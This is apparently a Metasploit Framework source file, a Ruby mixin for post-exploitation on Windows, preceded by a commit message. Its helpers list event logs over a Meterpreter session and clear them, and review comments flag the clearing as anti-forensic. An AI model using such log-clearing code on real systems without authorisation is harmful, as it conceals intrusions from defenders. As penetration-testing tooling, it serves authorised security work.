75ba9110e2
Utilised it in various existing modules - this should fix some subtle bugs in specific modules' version detection.
# -*- coding: binary -*-
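module Msf
  class Post
    module Windows
      #
      # Helpers for enumerating and clearing Windows event logs over a
      # Meterpreter session. Mixed into post modules; it relies on the
      # including module also providing `get_version_info` (via the Version
      # mixin included below) and `registry_enumkeys` (presumably the
      # Msf::Post::Windows::Registry mixin — not visible here).
      #
      module Eventlog
        include Msf::Post::Windows::Version

        def initialize(info = {})
          super(
            update_info(
              info,
              'Compat' => {
                'Meterpreter' => {
                  # The Meterpreter command family this mixin depends on;
                  # presumably consumed by the framework's session
                  # compatibility checks so unsuitable sessions are refused.
                  'Commands' => %w[
                    stdapi_sys_eventlog_*
                  ]
                }
              }
            )
          )
        end

        #
        # Enumerate the event logs registered on the target.
        #
        # Reads the subkeys of the EventLog service registry key; each subkey
        # is one log name (e.g. "Application", "Security", "System").
        #
        # @return [Array<String>, nil] the log names, or whatever
        #   registry_enumkeys returns when the key cannot be read (nil in the
        #   registry mixin as far as I recall — TODO confirm against the mixin)
        #
        def eventlog_list
          base = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\'
          version = get_version_info
          # Windows 2000 through Server 2003 SP2 get the capitalised key name,
          # everything else the lower-case one. Windows registry key names are
          # not case-sensitive, so the distinction is kept for fidelity with
          # the original rather than because the lookup would otherwise fail.
          legacy = version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Server2003_SP2)
          key = legacy ? "#{base}Eventlog" : "#{base}eventlog"
          registry_enumkeys(key)
        end

        #
        # Clear one event log, or every log returned by eventlog_list when no
        # name is given.
        #
        # @param evt [String] name of the log to clear; '' (the default) means
        #   all logs
        # @return [Array<String>] names of the logs that were cleared
        # @raise whatever session.sys.eventlog.open / #clear raise when a log
        #   cannot be opened or cleared (e.g. insufficient privilege) — nothing
        #   is rescued here, so one failing log aborts the remaining ones.
        #
        # NOTE(review): this is an anti-forensic action. On modern Windows the
        # act of clearing a log is itself recorded (e.g. Security event 1102,
        # System event 104), so the target is not left "clean" — operators
        # should confirm this for the target version before relying on it.
        #
        def eventlog_clear(evt = '')
          # Fix: the original called `eventloglist`, which does not exist (the
          # enumerator is `eventlog_list`), so the "clear everything" path
          # always raised NoMethodError. Array() additionally turns a nil
          # listing into an empty run instead of a NoMethodError on nil.each.
          targets = evt.empty? ? Array(eventlog_list) : [evt]
          targets.each do |name|
            session.sys.eventlog.open(name).clear
          end
          targets
        end
      end
    end
  end
end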